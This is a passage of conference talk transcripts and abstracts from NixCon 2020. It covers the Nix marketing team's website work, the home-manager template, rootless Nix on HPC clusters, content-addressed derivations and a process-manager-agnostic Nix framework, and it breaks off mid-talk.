this, right? But, as I said, it doesn't have to be evil.
I'll try to give an example of good and bad marketing, or at least I hope I don't mess this up. Let's say you go on a first date: you don't just put on the first t-shirt that you find, you actually put on something better. You're trying to present yourself in the best light possible. And that's already some sort of marketing, so to say, right? Because you don't want to lie, you don't want to deceive, but you want to put forward your best. It's in our human nature to take first impressions really seriously. At least in the school where I went, if you're not good in the first semester, that's where you get the label for the rest of your time in the school. So first impressions are really important. And there are many more human behaviors like this that we need to take into account. I like to consider myself a problem solver — I like to see a problem and try to solve it. And the problem of growing the adoption of Nix was a problem that I couldn't solve. Like, how can we solve it? And this is one of the things that put me on the path of marketing. And, you know, many books and many talks with people later, this led me this year to create a marketing team. I mean, I was only the person to announce it, and then others joined. But this was important, because you cannot really do the whole marketing process by yourself. You need to be a team, especially if you want to do this in a continuous way. But before we continue — and this is actually really important — I'd like to also discuss what marketing is. I know it's a bit of going off the rails, but I don't think I addressed what marketing is. And one of the many complaints I received when talking about marketing is that the language that marketeers use is unfriendly, or very foreign, right?
And that is because a lot of the resources you can read on marketing — and there are many — are written in a language about measuring customers and sales and so on. But there are not many books written about marketing for open source; actually, I didn't find any. There are a few blog posts and a few presentations on this topic, but not many, or at least not specifically mentioning marketing — they take different aspects of it. So I composed a definition: there is not one single definition of marketing, so I took a few definitions and tried to combine them and, of course, translate them — because I don't want to call our new Nix users customers, and I don't want to talk about sales. But for the purpose of the Nix marketing team, I think we can say that marketing is any non-coding activity that drives adoption. So everything non-coding that will drive adoption is in, or at least touching, the area of marketing. The marketing team will most likely not be the only contributor to this, but if there is nobody else, this needs to be done. So I think this kind of answers it, and that's also the reason why I gave the marketing team the marketing name: because it's all about adoption. And importantly, I'll say it again: there is a good and a bad way to do marketing. I don't want to deceive people, I don't want to put up bad ads or things like this. I just want to give Nix a chance. I want to dress Nix well for its first date, basically, right? So, with that out of the way, I'd like to take you on a journey of what we did in the last six months — it's a bit more, but in the last milestone. And before that, I'd just like to note that this was not only my work; there is a team behind it, right?
You probably met the team if you followed our minutes, which we try to publish as soon as we have a meeting and the time to write them. Importantly, for each of these milestones we have a certain goal that we try to focus on, and from there we define certain tasks. And our first goal — this was actually our first few meetings: what are we actually going to do in marketing? There were a few ideas thrown around, but the goal that we decided on was: we need to change nixos.org. We need to make it look like a modern and maintained project, ready to be used in production. And then we developed a three-phase, three-step plan that we would follow. First: in order to do any kind of redesign, or even have any marketing conversation, you need to know your audience and the use cases — in this case, for Nix and NixOS. And here I want to emphasize that we only define these primary use cases for nixos.org. Nothing changes in the code itself; it's only about what we will put higher, what will have a higher priority over other things. Next: you cannot redesign if you don't have the content and structure of the website. Usually this comes together, although in our current case, where we are redesigning an existing page, we could already adjust the content with the ideas that would drive the redesign later on. So we did that. And the last step, which is still a bit in progress, is the redesign of nixos.org — so, actually writing the CSS. So going back to number one: what was decided? First of all, nothing is really decided for the long term: each year we will reevaluate whether our audience and use cases are still valid, and adjust. One aspect of the marketing team is that we need to listen to everybody, and that's why we put all the minutes out, and we do listen to the feedback you give us.
We might work on it a bit slower, at a different pace, in a different order, but we do listen to it; we do take it into account. So the primary audience we chose for the website is beginners and decision makers — the ones who decide whether Nix is actually good enough to be used in their company. And the primary use case for Nix is development environments. To translate it for Nix developers, this means nix-shell — everything around nix-shell. I think it's the most polished solution that we have out there, and the most underrated; we don't promote it enough. A lot of talks mention how great nix-shell is, and I think the website needs to reflect this as well. And the use case for NixOS is cloud ops, or cloud deployments: building cloud images, something along those lines. And this will change, I am sure, but we needed to pick one, and I think building Docker images and EC2 images is the most polished solution we currently have. If this changes, we'll all be really happy — this is something that is in flux. But this drove the reorganization, especially of the landing page: what's on it and what's not, what's at the top of other pages — it all drives it. And I welcome you to go to the Wayback Machine on archive.org and look at how the website looked at the beginning of the year, then fast forward to today and compare; I think the difference is clear. Now, what we said in the beginning — and I was very cautious about this — is that we are not looking to do a perfect redesign, a perfect change, all at once. What's more important is that we make changes incrementally, always for the better, and eventually we'll get to a better place.
And the goal of the redesign was achieved, because we didn't look for a perfect website, a perfect design that will be there forever; we looked for something that will look modern and maintained. With the content, I think we are yet to provide the feeling that this can be used in production — but more on this later. So, with the 20.09 release happening soon, we are ending this milestone, and we mostly succeeded. I think we can still do a lot more on being explicit that Nix and NixOS are tools that are being used in production, and that a visitor can use them too. So I'd like to look at the next period. Importantly, nothing is set in stone, because each half year the group reorganizes a bit and the people in the group decide what to work on. But these are some issues that we have in our bucket that we think we should work on, and the goal will be to make onboarding easier. Now we have a website, now we have a base; now we need to make the whole onboarding experience easier. One of the things is that we want to serve fresh cloud images: each successful NixOS evaluation should push images — not only a fresh EC2 image, we want to expand this to other cloud providers, especially the top three: let's say Google, Azure and EC2. So at least those, if not more — why not? Because if we want to be seen as really good for cloud, for building cloud images, they should be easy to start with, like we have now, with the click of a button. Another idea we have — a clear idea — is that we need language-specific tutorials. A lot of people come to us and say: I want to use Python with Nix, how do I do this? On the learn page, there should be a visible section per language.
There were many talks at this conference on the Java ecosystem, and — what else — Scala. So we need those instructions in one place, and actually outside the manual, geared towards newcomers. Another idea is prominent Docker support. This is more for the purpose of people trying things out: using Docker as a vehicle — using other technologies as a vehicle — to try out Nix will make onboarding much easier. We can dive deeper after the talk into why the current Docker story is not good, but we need to make it easier to try Nix, and Docker might help us there. Oh yeah — my video is covering this here — exposed internal community communication. All the teams we have, how they communicate, what they do; there are many minutes scattered all over the place. We want to bring them together and help people who have already started using Nix and want to contribute, and give them a roadmap of how and where to go to find what's currently in development in Nix. So: what's the state of RFCs, what's being talked about, and things like this. Next on the list, we want to have a jobs section. I think Domen yesterday mentioned this cycle where you have industry and developers and everything feeds into each other. And I think having a jobs section will do two things: it will make it easier for you to find your next Nix job, and it also looks very production-ready, because everybody that adopts Nix will also want to hire. One of the things I already started is gathering success stories and white papers, and I hope to do many more.
And once I gather at least five or eight of them, I will open this section on the website, where people will see how Nix is used in maybe really obscure places, and how it's bending what people think Nix can do. And then there is commercial support. I think everybody gets stuck with Nix, especially in the beginning, and they look for companies to help them. This can of course be a bit of a controversial thing, but having a list of Nix providers that can help you — either individuals or companies — in a fair way, with emphasis on fair, so everybody gets the same space and so on — I think that will address the production-quality goal from the previous milestone. So there are many, many things to work on, and not all of them are what you would assume is marketing. Building fresh images, for instance, involves some coding — although not on Nix itself — and working with infrastructure. So I welcome you to join us; we are still open for new members for another two weeks. I'm not sure whether you can hear me — I lost all connection to the chat — but I'll try to go quickly forward through the slides, as I was already at the end. So yeah, please join us. We only invite new people to the marketing team during a short window around the end of each release. So ping me on IRC — I'm garbas on IRC, or on Twitter, or, I think, also on Discourse. At the end, I'd like to answer just this question: do we really need to do marketing? I think we do. We need marketing. Every successful project needs marketing, and if Nix wants to be successful, we need to do marketing. Marketing is a lot of work — not because it's hard, but coordinating all of this, making sure all the images are there. So don't underestimate it. And with this, I'll end, and I hope I'll see you.
Okay, it seems we only have one question, and it's honestly just a cheeky comment. I would say it's a good sign that you don't have many questions, because you really were very thorough in your presentation. So, okay, I'll read it to you: how about planting a tree for each person installing NixOS? Sorry, again? How about planting a tree for each person installing NixOS? I'm not sure if this is going to help NixOS adoption, but if it does, let's do it. Okay. So on that note, I would like to thank you. I really loved the moment where you mentioned that we lack control over our subconscious, and that with awareness you can use it to your advantage. I personally believe, at least for myself, that I have a pretty good hold on my subconscious communication, and you usually can sort of tell that by how people feel just by meeting you. So yeah. — I find that a lot of the time we think we do have control, and most of the time we make excuses for our subconscious. But it's good to be aware; once you're aware, you can actually start to control it. And this field is just enormous, and I'm always impressed that I didn't know about it. — Yeah, throughout your talk you guided us through a lot of your awareness of these situations and pulled that back into why a marketing team is necessary. So I would like to thank you for starting this initiative, the marketing team, and doing all this research — just really everything. — Thank you so much. — Thank you. Yep.
In my talk I'd like to go over: Why Nix community needs a marketing team What have we been up to in marketing team in the last 6 months What are the plans for the next 6 months Marketing, and non-technical work in general, is all too often an afterthought for developers or worse it is viewed as something negative. I really wish it weren’t the case. Having clearly defined problems, audience and strategy should be as important to us as having clean and tested code. This is important for Nix. This is important for any project that aims to succeed.
10.5446/50704 (DOI)
Okay. Next up is Ryan Mulligan with home-manager template. This is his project which provides a quick-start template for using Home Manager in a more reproducible way, so you don't have to install Home Manager, and it uses pinning. Pinning, I mean. Hi, my name is Ryan Mulligan and I'm going to talk about home-manager template. You can visit it at GitHub: ryantm/home-manager-template. Why would you want to use Home Manager? Home Manager lets you reproduce your user configuration instantly on new computers, and also across multiple computers, so you can have consistent configuration everywhere. It also lets you leverage a common configuration ecosystem: Home Manager maintains a set of NixOS-like modules that lets you use other people's work, so we have less duplicated work. What is Home Manager? It lets you organize your home with NixOS-like configuration. There's a file called home.nix, which is very similar to your configuration.nix in NixOS, and then there's home-manager switch, which is like nixos-rebuild switch, for switching to a new configuration. It does not require NixOS: you can use it on any Linux system to configure your user environment. So who is home-manager template for? It's for people that are allergic to installation instructions, people who don't like state, and people who want maximum reproducibility. So let's get into the details about how you can use it. What is home-manager template? It's a template file structure that is basically just a Nix shell where Home Manager is installed and all the dependencies are pinned, so you don't need to install Home Manager. So here's how you use it. First, you install Nix. Then you go to the home-manager-template repo and click "use this template". Then you clone your repository on the computer that you want to configure.
Then you can update the dependencies to the latest version by running the update-dependencies script, edit home.nix, and switch to your configuration with the switch shell command. So here's an example of a minimal configuration that you might have when you start out. First you need to specify your username and the home directory that you want to configure, and the Home Manager state version that you're currently on. Then you need to specify that Home Manager will manage your shell. This is necessary with home-manager template because it doesn't install Home Manager, so you need some other way to hook into Home Manager's activation hooks; one way to do that is to have it manage your shell. And then you can install various packages. There are lots of other configuration options available in Home Manager, and they're documented in the manual. So after we have this home.nix file created, we run switch. In my example I have installed the package cowsay, so now we have cowsay available and we can say "hello NixCon 2020". So that's the very basic quick overview of home-manager template. It's a very simple wrapper around Home Manager, so I recommend you check it out — it's very quick to get started — and also check out Home Manager, which is a great project; the Home Manager manual has all the details about the additional configuration options that you can use. If you'd like to look at the slides for my talk, they're available here, and feel free to email me with any questions or comments you might have. Thank you very much. Thank you to the organizers and all the attendees.
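The minimal home.nix walked through above might look roughly like this — a sketch, with the username, home directory and state version as placeholders to be replaced with your own values:

```nix
{ pkgs, ... }:
{
  # Placeholders: use your own username and home directory.
  home.username = "alice";
  home.homeDirectory = "/home/alice";
  home.stateVersion = "20.09";

  # Let Home Manager manage your shell so its hooks get activated —
  # needed here because home-manager-template never installs
  # Home Manager into your profile.
  programs.bash.enable = true;

  # Packages to install into your user environment.
  home.packages = [ pkgs.cowsay ];
}
```

After editing this file, running the template's switch command applies it, and `cowsay "hello NixCon 2020"` becomes available in your environment.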
home-manager template provides a quick-start template for using home-manager in a more reproducible way. You don't have to install home-manager, and it uses pinning.
10.5446/50705 (DOI)
Okay, everyone, give it up for Théophane or I'll be really disappointed. Okay, next up is Nix from the Dark Ages: Without Root. This is by Rohit Goswami, and this talk centers on comments from the trenches of high-performance clusters, on working with Nix on kernel-locked-down systems without proot support. So go on. Good morning, I'm Rohit Goswami and I'm going to be talking about Nix in the Dark Ages, without root. It's a short talk, so I'm just going to run through this quickly. So first and foremost: hello NixCon! This is my first NixCon and I'm super excited to be here. This is me — you can check that out later. So what's the big picture? What is going on? Well, on the right you'll see an academic cluster picture from GE Research. And what's the problem, really? Well, there's no Docker, or if you're very lucky, in some places you might have Singularity. You won't have any user-space support, which means you can't even play around with proot, and it probably runs an old CentOS or something, as you can see in the lower right. If you check this out later, you'll also see that these machines are typically quite powerful — that's the whole point of using them; there's a lot of power in these clusters. And there's also a network file system, typically Lustre or GlusterFS, or even in some cases NFS. And there's always a resource queue, either through Slurm or, previously, Torque, or something like that. Again, if you're lucky and the cluster is managed well, you might find support for Lmod, which is a path helper, as some of you might know. And why is this? Why does it run an old CentOS? Why, you know, what's going on?
Well, it's a necessary evil: users can't be trusted. There are a lot of resources which are being consumed, and you have to track these because people pay for them. But, you know, users do need new software, developers especially; a lot of my work involves a lot of high-performance coding, and I need to know reproducibly that my stuff works. So Nix is the solution, clearly, and it's been adopted by some in the scientific community. It's been around for a long time now; it's 16 years. Yeah, but does no one use it? That's not exactly true. There are clusters that use it, with good support, like GRICAD, which even has an ACM paper on it, and the Flatiron Institute and Compute Canada also support Nix. But what if no one cared? What if nobody cared that you have problems, or that you like Nix? Well, then you end up here, in this presentation. So where are we exactly? Well, there's a whole lot of user-install junk in the post which accompanies this, and I'm not going to get into all of that, but the basic concept is: do something to get Nix up, append unholy things to PATH, you know, prune bits of the source code, just get it to install somehow, and then have Nix reinstall itself, right? So I'm not the first to think of this; there are these two excellent repositories which I liberally looked into when I was doing this, and unfortunately, you know, none of them are up to date, hence this. So are we done? Is it over? Well, no; even for a short presentation there's still a lot of time. So not quite. So what went wrong? Well, if you follow along the methodology which I covered in the post, then, well, you basically can't utilize the cache, and you're basically running on the login node, and you're wasting a lot of resources. Yes, these resources can be tracked down to you; you can be censured for it. So, you know, in that sense you're still responsible, but, you know, this is not great, right? So what do we need, really? We need better permission handling.
There was this incredible moment when the permissions were so poorly set that you actually had to run a little watch command, which is terrible, and of course, you know, nobody should have 777 permissions, but still. Okay, so there's another issue, which is that the lock is not necessarily released at the same time, especially when you're building a large package, and one of the quote-unquote fixes is basically moving the package, moving the entire directory, and then rebuilding it, which is clearly not ideal, right? So where are we really? Well, builds and queues: we need to know who's building what, and we also need to be able to run on the entire cluster, not just the login node, right? So, future directions. There's the union mount proposal, which essentially is meant for efficient private stores; it's a step in the right direction. It would reduce compilation, though it doesn't actually replace the global store. There's a discussion here on Reddit. And my own personal goals, what I want to do: well, I was thinking of looking into hashing relative to a prefix, and a cleaner setup, definitely. I mean, it's a long blog post, and it is not pretty right now to do this, and hopefully I'll be back next year with a more complete project, really, with more information and with a better approach to this. I have a couple of years left on my PhD, and I plan to use Nix exclusively, so yeah, I'm definitely going to be looking into this more. So, that's the end. Well, not exactly: there's the bibliography, and thank you. Thank you for your attention.
“Nix from the dark ages (without Root)” Rohit Goswami · Lightning Talk (5 minutes) Short comments from the trenches of High Performance Clusters on working with Nix on kernel locked-in systems without proot support.
10.5446/50706 (DOI)
Okay, hello, we are back with lightning talks. So if you're not familiar with lightning talks, it really is just simply a five-minute talk, so it has to be very quick for that person, and I believe most of these are pre-recorded. So our first lightning talk is called "Content-addressed derivations". This is by Théophane Hufschmitt, and I don't actually have an abstract for that, so I will just let you play the clip. Hello everyone, I'm Théophane from Tweag, and I'm going to talk to you today about content-addressed derivations in Nix, which is something I've been working on for the past few months, with the help of John Ericson and Eelco in particular. So before explaining what content-addressed derivations are and why they're awesome, let me get back to the classical derivations in Nix, which are input-addressed derivations. So the distinction between input-addressed and content-addressed derivations has to do with the way Nix computes the hash of the output paths of the derivation, the output paths being the things with a big hash under /nix/store.
So for input-addressed derivations, what happens is that each derivation, like hello.drv, has a bunch of inputs, be they files or other derivations or strings in the derivation, including the build command itself or the environment variables that are going to be available in the build environment. And all these inputs will be assigned a hash, and then Nix will take all these hashes, put them in a box, shake the box, and hash the result. And this is going to be the hash of the hello derivation, and from this hash Nix will be able to compute the different output paths of the derivation. So this is Nix as we know it, how Nix has been working for the last 15 years. And it's really cool, because if I somehow change my input GCC, it's going to get assigned a new hash, and transitively hello is going to get assigned a new hash, and so Nix knows that it has to rebuild both GCC and hello. But the old and the new can coexist in the store; I can roll back; I can do whatever I want. That's wonderful. The thing that's not wonderful, though, is that maybe I'm a perfectionist, and I just happen to be skimming through the GCC code base, and I found a typo in a comment. So I fix that, because I can't live with the idea that one of my dependencies has a typo in a comment. But by doing that I changed the hash of the GCC derivation, so now I have to rebuild GCC, but more importantly, I have to rebuild my own hello project, and I don't want to do that. Because what I know is that I just changed a comment, which means that the GCC executable will be the same, which means that I know that the output of my hello derivation will also be the same, because it had, in a way, the same inputs: the same hello.c source file, the same bash derivation, the same build command, and the same GCC binary. But Nix doesn't know that. "Just changing a comment" has no meaning for it; it doesn't know what a comment is anyways. All it sees is that I changed the source of GCC, which means that I changed the GCC derivation, which means
that I changed everything that was depending on it. Content-addressed derivations take a different path. The idea is that rather than having hello.drv directly depend on the GCC or bash derivations, it depends on their output paths. So what happens is that Nix is first going to build GCC; this is going to yield some output path, and then Nix is going to hash the content of that output path, and this will be the hash of the output path, this abcd hash you can see. And likewise, Nix is going to build bash, and it's going to hash the output path of bash. And these two hashes are what is going to be fed into the Nix hashing process for hello.drv, rather than the hashes of the GCC and bash derivations themselves. This means that if I change my GCC derivation, so its hash changes, but in a way that keeps the same output, then hello.drv will effectively have the same inputs, so it won't be invalidated, and I won't have to rebuild it. So that's, in a very hand-waving way, how content-addressed derivations work, of course, but that should hopefully give you the high-level idea of how it works and why it's useful. And I'm pretty sure that this is going to unlock a whole new range of potential use cases for Nix, and I'm eagerly waiting for it to land in a released Nix version, which I hope is going to happen soon. Thank you everyone for your time, and you can reach me if you need, everywhere there, just not this weekend, because I'm off right now. But thanks, everyone.
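The experimental Nix interface for opting a derivation into content addressing looks roughly like this (a sketch; it assumes the experimental `ca-derivations` feature described in this work is enabled, and the exact attribute names may still change as the feature lands in a release):

```nix
# Sketch of a floating content-addressed derivation, assuming
# experimental-features = nix-command ca-derivations in nix.conf.
{ pkgs ? import <nixpkgs> {} }:

pkgs.runCommand "hello-ca"
  {
    # Opt this derivation into content addressing: its store path is
    # derived from a hash of the build *output*, not of the inputs.
    __contentAddressed = true;
    outputHashMode = "recursive";
    outputHashAlgo = "sha256";
  }
  ''
    mkdir -p $out
    echo "hello" > $out/greeting
  ''
```

With this, two derivations that differ only in build-irrelevant inputs (such as the comment-only GCC change above) but produce byte-identical output map to the same store path, which is exactly what lets downstream rebuilds be skipped.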
This is part of the Intensional Store model.
10.5446/50708 (DOI)
Our next talk is "Nix process management: an experimental Nix-based, process-manager-agnostic framework", and the presenter is Sander van der Burg. This talk is about complementing Nix with any process manager. And a little bit more information about Sander, if you're not familiar: he has been a Nix contributor since 2007 who's worked on so many things, such as the FHS chroot environments and the Nix Android build environment, and is the main developer of various Nix-related utilities such as Disnix, Dysnomia, node2nix, and composer2nix. And I would also suspect that a lot of NixOS users have probably encountered Sander's blog, which is sandervanderburg.blogspot.com. Okay, with that out of the way, feel free to start, Sander. Okay, thank you for the kind introduction. So hello, everybody. This presentation is going to be about a personal research project that I've been working on in the last year or so, and I think it addresses a very important shortcoming of basically the tools in the Nix ecosystem. So as you may probably already know, the Nix package manager is a powerful solution. It offers all kinds of nice features: you can conveniently construct packages from source code and all the required build-time dependencies; it offers build determinism; transparent binary deployments, by downloading existing builds from a binary cache; it allows you to store multiple versions and variants of the same package safely next to each other; and you can do unprivileged user deployments, so if you want to install packages, you don't need to be root. It can also be used on multiple operating systems: in addition to Linux, it is also well supported on macOS, and very recently Nix was also accepted into the FreeBSD ports tree. And with a little effort, you can also use it on other Unix-like operating systems as well.
So when I have to explain Nix to newcomers, what I typically use is a nix-shell example to show all kinds of nice, interesting properties of Nix. For example, if you're on a conventional Linux distribution and you want to work with packages like Python or Node.js, you may already have a version of Python installed on your machine, and you may not have installed Node.js yet. And what you can conveniently do is spawn a shell session in which you have a certain version of Python and Node.js, and the Nix package manager will automatically install them. And in this shell session, you can basically use these development utilities. And the nice thing is, because they're stored in the Nix store, they will not conflict with other versions of packages, and they won't interfere with packages installed on your host system either. So when I show this to people, especially newcomers, they typically get quite happy. Basically, what they tell me is: yes, this is exactly what I'm looking for. So I'm going to experiment with packages; I'll try to install PostgreSQL or the Apache web server or Nginx, because, yeah, Nix is a very convenient tool to experiment with packages. And then I have to disappoint people, because I have to explain to them: Nix is a package manager, it's not a service manager. So you can install, for example, the Apache web server on your machine, but it just provides you the executable. You're still responsible for configuring the service yourself, and also for making sure that the lifecycle of the process gets managed. And in order to do that, you basically need to use some other tool, like systemd. And that is actually quite confusing for newcomers. So what I also typically do is explain to newcomers that there is, of course, the Nix package manager, but there are also sister projects that can complement Nix with all kinds of other deployment features, such as process management. And I think the most famous project is NixOS.
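The newcomer demo described above can be done ad hoc with `nix-shell -p python3 nodejs`, or, a bit more reproducibly, with a small shell.nix along these lines (a sketch; the package names come from Nixpkgs):

```nix
# shell.nix — a throwaway development environment with Python and
# Node.js from Nixpkgs, without touching packages on the host system.
{ pkgs ? import <nixpkgs> {} }:

pkgs.mkShell {
  buildInputs = [
    pkgs.python3
    pkgs.nodejs
  ];
}
```

Running `nix-shell` in the same directory drops you into a shell where `python3` and `node` are on the PATH; leaving the shell leaves the host system untouched.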
So NixOS can generate systemd unit files with the package manager, and then systemd is responsible for managing the lifecycle of these processes. But there's one catch: if you want to use NixOS, that basically means you're forced to adopt a fully Nix-managed Linux distribution. And if you want to use another operating system, or if you're not familiar with Nix yet, this is typically a pain. For seasoned users like me, this is not a big deal (this is actually what I want), but it's not always an option to use NixOS. The same thing, for example, applies to macOS. On macOS there is a project called nix-darwin that offers all kinds of system services that you can manage with launchd, but obviously it's limited to macOS only. So people on conventional Linux distributions typically tell me: yeah, perhaps I should use Docker, because with Docker I can manage services. And then I can, of course, also tell people that Nix is an interesting solution to use in combination with Docker. You can basically use Nix in the construction of images; you can even use Nix to build Docker images completely, and these images are typically way more space-efficient than conventional Docker images. But this is not always a compelling use case, because what we're basically doing is squeezing Nix into a Docker workflow; it's not a Nix-driven deployment process. So this is basically my motivation for starting to develop the Nix process management framework. It's a general solution for complementing Nix with process management facilities, and it's built around a number of key concepts. First of all, it's entirely Nix-driven: the idea is that you write system configurations completely in the Nix expression language. It's also based on simple conventions, meaning you follow conventions similar to how packages are organized in the Nixpkgs repository. So the idea is that for running processes, you write a function definition.
And to compose running process instances, you define an attribute set with function invocations. A nice small extension to this framework is that you can also organize process dependencies with the same formalism, and the framework will automatically arrange the ordering if needed, so that, for example, processes are activated in the right order. Another key concept is that it's process-manager-agnostic. It's not designed for a specific solution; it should work with all kinds of process managers. Currently you can use sysvinit scripts, supervisord, systemd, launchd, BSD rc scripts, and Windows services on Cygwin. But the nice thing is, the model is flexible enough that you can even use it with solutions that don't qualify as process managers. You can, for example, also use it in combination with Disnix and Docker. And the reason you can do that is that these are multifunctional solutions which can also organize processes, so in the framework we can use these properties for all kinds of interesting purposes. It's also operating-system-agnostic, because it supports process managers on a variety of operating systems, and Nix is portable to some degree as well. You can also use it for unprivileged user installations. The reason that is possible is that I built in a global switch that allows you to disable the creation of users and the changing of user permissions. As a non-root user you typically don't have the permissions to do this, and by disabling it, you can basically just run any process you want without restrictions. And the final key concept is that it doesn't require any advanced concepts like namespaces and cgroups that are commonly used for containers. The solution relies on conflict avoidance rather than isolation, and that is, for example, good for portability, as I'll explain later in this presentation. So now to explain how the framework works.
I developed a very simple example system. It's actually quite an over-engineered example, but I think it makes it quite easy to understand how the framework works. Basically, this is a web application system that consists of multiple running processes. What you see on the right of this diagram are three web application processes: processes with an embedded HTTP server, whose only purpose is to render a static HTML page that states the identity of the service. In front of the web application processes there's Nginx, which acts as a reverse proxy. Nginx redirects users to the web application process instances based on the virtual host header field. For example, if the user opens the URL webapp1.local in the web browser, then Nginx will redirect the user to the first web application instance. Likewise, for webapp2.local, the user gets redirected to the second web app instance. So in order to automate the deployment of this system, we have four process instances, and you need to write Nix expressions for each process instance. One way of doing that is by specifically writing a Nix expression for a process and a specific service manager, such as sysvinit. And this is basically what such a Nix expression looks like. As you may notice, this is actually quite similar to the convention for how we declare packages with the Nix package manager. This is a function definition; the first line is the function header, and these refer to all the build inputs that are required to generate a sysvinit script. createSystemVInitScript is an abstraction function that allows you to generate a huge shell script with deployment activities, webapp refers to the web application executable, and port refers to the TCP port number that the server should bind to.
And what I do in the body is invoke the function abstraction and specify what all the deployment activities should look like. This, for example, is the start activity: it starts the executable and uses the -D parameter to specify that it should run in daemon mode. The stop activity stops the executable; the restart activity is basically calling stop and start; and status is used to show whether the process is running or not. The runlevels parameter specifies the runlevels. I don't know if you still recall the sysvinit scripts that we used to develop ten years ago: when you boot into runlevel 3, that is typically used to boot in terminal mode, and runlevel 5 is used to boot a graphical desktop environment. And basically this parameter states that the service should start on boot-up for all these three runlevels. Now, writing a sysvinit script like this is a bit verbose. If I have to package another process like Nginx, for example, then I end up repeating the same patterns over and over again. So what I also did is develop a higher-level abstraction function for sysvinit scripts that looks like this. Instead of specifying the activities, I specify the process that I want to manage: this is the executable I want to manage, with this command-line parameter. And what the function abstraction does is infer the activities automatically, so the result of evaluating this function invocation is this. The framework also has abstraction functions for other service managers. This was sysvinit, but maybe I want to use systemd instead. So this is the function abstraction that you can use to generate systemd unit configuration files. Again, what I do here is specify what executable I want to manage and to which TCP port it should bind.
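The higher-level sysvinit expression described above looks roughly like this (a sketch reconstructed from the talk; the attribute names follow the description of `createSystemVInitScript` in nix-processmgmt but may not match the framework verbatim):

```nix
# Sketch of a sysvinit-specific constructor for the webapp process.
# Outer function: build inputs; inner function: instance parameters.
{ createSystemVInitScript, webapp }:

{ port }:

createSystemVInitScript {
  name = "webapp";

  # The executable to manage; the framework infers start/stop/restart/
  # status activities from it instead of spelling each one out.
  process = "${webapp}/bin/webapp";
  args = [ "-D" ];          # -D: run in daemon mode

  runlevels = [ 3 4 5 ];    # start on boot for these runlevels
  environment = { PORT = port; };
}
```

Evaluating this yields the same kind of generated init script as the verbose activities-based variant, without repeating the start/stop boilerplate for every service.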
And basically what this function abstraction does is generate a systemd unit configuration file with a nearly identical structure. This is pretty much a one-to-one translation from a Nix expression to a systemd unit configuration file. And the framework is full of other abstraction functions for all kinds of process managers: there's also, for example, the createSupervisordProgram abstraction function, there are abstraction functions for launchd, for BSD rc scripts, and many more. Now, the interesting thing is, if I compare the systemd expression with the sysvinit expression that I've shown in the previous slide, you see that they're slightly different, but they're not all that different; they're still mostly the same. So what I also did in the framework is create an abstraction function that abstracts over all these process-manager-specific abstraction functions, and that basically looks like this. What I do in this particular Nix expression is use a generic createManagedProcess function that describes, from a high-level perspective, what process I want to manage. And these concepts can be easily translated into function invocations of the target-specific abstraction functions. Basically any process manager in the framework is supported: sysvinit, launchd, systemd, they can all work with a high-level specification like this. The only thing you need to do is this: systemd prefers to work with processes that run in the foreground, whereas sysvinit wants processes to daemonize on their own, so you need to specify, for both foreground processes and daemon processes, what additional settings they require. This daemonArgs parameter specifies: if the process needs to daemonize, then pass these command-line arguments to the executable. And if you want to run it as a foreground process, basically nothing extra is required.
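The process-manager-agnostic specification described above can be sketched like this (attribute names reconstructed from the talk's description of `createManagedProcess`; they may differ slightly from the framework):

```nix
# Sketch of a process-manager-agnostic constructor for the webapp
# process. The same specification can be translated to sysvinit,
# systemd, launchd, supervisord, etc.
{ createManagedProcess, webapp }:

{ port }:

createManagedProcess {
  name = "webapp";
  environment = { PORT = port; };

  # How to run the process in the foreground (preferred by systemd):
  foregroundProcess = "${webapp}/bin/webapp";

  # How to run it as a self-daemonizing process (preferred by
  # sysvinit); daemonArgs holds the extra daemonization flags.
  daemon = "${webapp}/bin/webapp";
  daemonArgs = [ "-D" ];
}
```

The framework then maps this high-level description onto whichever target-specific abstraction function (createSystemVInitScript, the systemd unit generator, and so on) the chosen backend requires.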
Actually, specifying foreground processes and daemons is not a strict requirement; either can be simulated, but for an optimal user experience it's important that you still make a distinction between the two. Then there's one more concept that I need to explain. In the example that I've shown you earlier, we want to run webapp processes, but we actually need multiple instances of them, three of them. To be able to construct multiple web application instances, you need to follow a slightly different convention. Basically, what I do here is declare a nested function. The outer function header refers to parameters that apply to all webapp process instances, and the inner function header refers to parameters that are instance-specific. And if you specify a unique combination of these parameters, then multiple instances can coexist on the same machine. For example, the port number: only one service can bind to a specific port number, but if you let every instance bind to a unique port number, they can coexist. And the same thing applies to the instance name. Normally, when you launch a process as a daemon, the PID file has the same name as the daemon, but if you want to run multiple instances, you have to generate PID files with unique names. The instance name parameter is a high-level concept that allows you to generate unique PID file names, so that processes can coexist. So in addition to declaring constructor functions that you can use to create process instances, you also need to actually specify what process instances you need, and that is done in a composition model that looks like this. Again, this is similar to the top-level expression in the Nixpkgs collection. This declares a function; these are parameters that basically apply to all... Excuse me, Sander, sorry to interrupt you. Yes? Your Q&A portion is in about three minutes.
So you'll be eating into that. Oh yeah, I'm almost done. Yeah, so these properties apply to all running instances. And what I do here is construct two webapp instances; they can coexist because they have a unique port number and instance suffix. And in this expression I also construct an Nginx reverse proxy, which is responsible for setting up the redirection. So I'm actually going to take a risk now. I'll show you that this is basically the example, and I can deploy it. This deploys the entire system as a collection of sysvinit scripts. As you can see, it deploys the instances for the web application and the Nginx instance. And this shows that the redirection is working: now the first instance is responding, and now the second instance is responding. I can also undeploy the system, like this, and now it's not running anymore. I can also deploy it with systemd: if I change the command-line instruction from sysvinit to systemd, I can deploy the entire system as systemd units. And as you can see, the system responds again, and if I request a process overview, you can also see that the system is running. So I basically used one single specification to deploy the system with multiple process managers. So I'm almost done; I'll just wrap up, because I'm running out of time. There are lots more interesting combinations possible. You can also deploy on FreeBSD as BSD rc scripts; you can even deploy Docker containers for the process instances. There are lots of other features that I haven't explained: you can also create users and groups so that the processes run as unprivileged users; you can automatically assign port numbers, user IDs, and group IDs; and you can also combine the Nix process management framework with Disnix.
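The composition model described above can be sketched as a top-level expression along these lines (a sketch reconstructed from the talk; the file layout and constructor names are assumptions, not verbatim from the framework):

```nix
# processes.nix — sketch of the composition model: an attribute set of
# function invocations that instantiates the constructor functions.
{ pkgs, stateDir, ... }:

let
  constructors = import ./constructors.nix { inherit pkgs stateDir; };
in
rec {
  # Two webapp instances; unique ports and instance suffixes let them
  # coexist on the same machine.
  webapp1 = rec {
    port = 5000;
    pkg = constructors.webapp { inherit port; instanceSuffix = "1"; };
  };

  webapp2 = rec {
    port = 5001;
    pkg = constructors.webapp { inherit port; instanceSuffix = "2"; };
  };

  # The reverse proxy depends on the webapp instances, so the
  # framework activates them in the right order.
  nginx = rec {
    port = 8080;
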